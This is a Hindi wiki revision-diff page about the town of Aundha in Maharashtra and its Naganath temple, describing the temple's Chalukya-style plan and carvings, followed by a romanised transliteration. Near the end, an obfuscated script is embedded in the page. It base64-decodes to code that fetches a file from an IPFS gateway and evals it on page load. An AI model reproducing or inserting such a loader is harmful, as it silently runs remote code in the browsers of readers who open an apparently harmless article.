Difference between revisions of "औंधा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}} औंधा महाराष्ट्र में पुणे-हिंगोली रे...' के साथ नया पन्ना बनाया)
 
m (Text replace - "नक्काशी" to "नक़्क़ाशी")
Line 1: Line 1:
 
{{पुनरीक्षण}}
 
{{पुनरीक्षण}}
औंधा [[महाराष्ट्र]] में [[पुणे]]-हिंगोली रेल मार्ग के चोंडी स्टेशन से आठ मील पर स्थित है। नागनाथ के मंदिर के कारण यह स्थान प्रख्यात है। कहा जाता कि मंदिर को किसी [[पांडव]] नरेश ने अपार धन लगाकर बनवाया था। मंदिर [[भारत]] के [[द्वादश ज्योतिर्लिंग|द्वादश ज्योतिर्लिंगों]] में से है। इसका नक्शा [[चालुक्य]] मंदिरों की भांति ही है। अर्थात् आधार ताराकृति है और बीच में एक बड़ा वर्गाकार मंडप है जिसके आगे उत्तर, दक्षिण, और पश्चिम की ओर द्वारमंडप बने हुए हैं। देवगृह या पूजा स्थान पूर्व की ओर है। द्वारमंडप की छत के आधार अतीव सुन्दर नक्काशीदार अष्टकोण स्तंभ हैं। देवगृह के द्वारों पर तथा उनके मंडपों पर भी बारीक नक्काशी है। भवन के बाहरी की ओर भी चालुक्य शैली में अत्यन्त कलापूर्ण तक्षण शिल्प दिखाई देता है। इसमें उत्कीर्ण मूर्तियों की अनुप्रस्थ तथा उदग्रपट्टियाँ हैं जिनके बीच-बीच में सादी नक्काशी रहित पट्टियाँ हैं [[हलेबिड]] के मंदिर की मूर्तिकला से इस मंदिर की मूर्तिकारी की समानता स्पष्ट दिखाई देती है।  
+
औंधा [[महाराष्ट्र]] में [[पुणे]]-हिंगोली रेल मार्ग के चोंडी स्टेशन से आठ मील पर स्थित है। नागनाथ के मंदिर के कारण यह स्थान प्रख्यात है। कहा जाता कि मंदिर को किसी [[पांडव]] नरेश ने अपार धन लगाकर बनवाया था। मंदिर [[भारत]] के [[द्वादश ज्योतिर्लिंग|द्वादश ज्योतिर्लिंगों]] में से है। इसका नक्शा [[चालुक्य]] मंदिरों की भांति ही है। अर्थात् आधार ताराकृति है और बीच में एक बड़ा वर्गाकार मंडप है जिसके आगे उत्तर, दक्षिण, और पश्चिम की ओर द्वारमंडप बने हुए हैं। देवगृह या पूजा स्थान पूर्व की ओर है। द्वारमंडप की छत के आधार अतीव सुन्दर नक़्क़ाशीदार अष्टकोण स्तंभ हैं। देवगृह के द्वारों पर तथा उनके मंडपों पर भी बारीक नक़्क़ाशी है। भवन के बाहरी की ओर भी चालुक्य शैली में अत्यन्त कलापूर्ण तक्षण शिल्प दिखाई देता है। इसमें उत्कीर्ण मूर्तियों की अनुप्रस्थ तथा उदग्रपट्टियाँ हैं जिनके बीच-बीच में सादी नक़्क़ाशी रहित पट्टियाँ हैं [[हलेबिड]] के मंदिर की मूर्तिकला से इस मंदिर की मूर्तिकारी की समानता स्पष्ट दिखाई देती है।  
  
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}

Revision as of 15:15, 11 July 2011

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

auandha maharashtr mean pune-hiangoli rel marg ke choandi steshan se ath mil par sthit hai. naganath ke mandir ke karan yah sthan prakhyat hai. kaha jata ki mandir ko kisi paandav naresh ne apar dhan lagakar banavaya tha. mandir bharat ke dvadash jyotirliangoan mean se hai. isaka naksha chaluky mandiroan ki bhaanti hi hai. arthath adhar tarakriti hai aur bich mean ek b da vargakar mandap hai jisake age uttar, dakshin, aur pashchim ki or dvaramandap bane hue haian. devagrih ya pooja sthan poorv ki or hai. dvaramandap ki chhat ke adhar ativ sundar naqqashidar ashtakon stanbh haian. devagrih ke dvaroan par tatha unake mandapoan par bhi barik naqqashi hai. bhavan ke bahari ki or bhi chaluky shaili mean atyant kalapoorn takshan shilp dikhaee deta hai. isamean utkirn moortiyoan ki anuprasth tatha udagrapattiyaan haian jinake bich-bich mean sadi naqqashi rahit pattiyaan haian halebid ke mandir ki moortikala se is mandir ki moortikari ki samanata spasht dikhaee deti hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh